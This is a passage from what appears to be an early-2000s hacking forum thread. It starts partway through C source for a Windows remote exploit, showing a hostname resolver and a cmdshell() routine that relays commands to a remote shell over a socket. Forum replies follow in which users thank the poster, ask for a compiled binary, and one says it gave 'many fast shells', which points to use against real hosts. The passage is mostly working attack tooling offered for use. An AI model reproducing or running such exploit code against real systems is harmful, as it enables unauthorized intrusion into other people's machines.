   WSACleanup();
 }
 
       return 0;
}

long gimmeip(char *hostname)
{
struct hostent *he;
unsigned long ipaddr;

/* inet_addr() returns INADDR_NONE (0xFFFFFFFF), not a negative value, when the
   argument is not a dotted quad; only then fall back to a DNS lookup. */
if ((ipaddr = inet_addr(hostname)) == INADDR_NONE)
{
 if ((he = gethostbyname(hostname)) == NULL)
 {
  printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
  WSACleanup();
  exit(1);
 }
 memcpy(&ipaddr, he->h_addr, sizeof(ipaddr));
}
return (long)ipaddr;
}
/********************************************************************************/
void cmdshell (int sock)
{
struct timeval tv;
fd_set rfds;
int length;
char buffer[1000];

/* Relay loop: whatever the shell sends is written to stdout; when the socket has
   been quiet for a second, a blocking read() on stdin picks up the next command.
   Same behaviour as the original hand-built fd_set (o[0]=count, o[1]=sock),
   written with the FD_* macros instead. */
while (1)
{
 tv.tv_sec = 1;
 tv.tv_usec = 0;
 FD_ZERO(&rfds);
 FD_SET(sock,&rfds);

 length = select (sock+1, &rfds, NULL, NULL, &tv);
 if(length == 1)
 {
  length = recv (sock, buffer, sizeof (buffer), 0);
  if (length <= 0)
  {
   printf ("[x] Connection closed.\n");
   WSACleanup();
   return;
  }
  length = write (1, buffer, length);
  if (length <= 0)
  {
   printf ("[x] Connection closed.\n");
   WSACleanup();
   return;
  }
 }
 else
 {
  length = read (0, buffer, sizeof (buffer));
  if (length <= 0)
  {
   printf("[x] Connection closed.\n");
   WSACleanup();
   return;
  }
  length = send(sock, buffer, length, 0);
  if (length <= 0)
  {
   printf("[x] Connection closed.\n");
   WSACleanup();
   return;
  }
 }
}

}
/********************************************************************************/


Feel free to make comments

Cya
dmg
Thanks mate!! Compiles cleanly here.
Jimbras
I get some errors.

Can you please post it compiled.

Thanks
vnet576
QUOTE (Jimbras @ Jan 8 2004, 08:13 PM)
I get some errors.

Can you please post it compiled.

Thanks

Us compiling it for you will only be a quick fix... it will not teach you how to compile your own exploits. Now, what errors did you get, since it compiled OK for me?
Xxplozive
It's a very nice xploit. I've got many fast shells.
zarp
Yes, it appears nice, this one. Thanks.
mmyumu
Thanks for this exploit, it seems to be nice.
Invision Power Board © 2001-2005 Invision Power Services, Inc.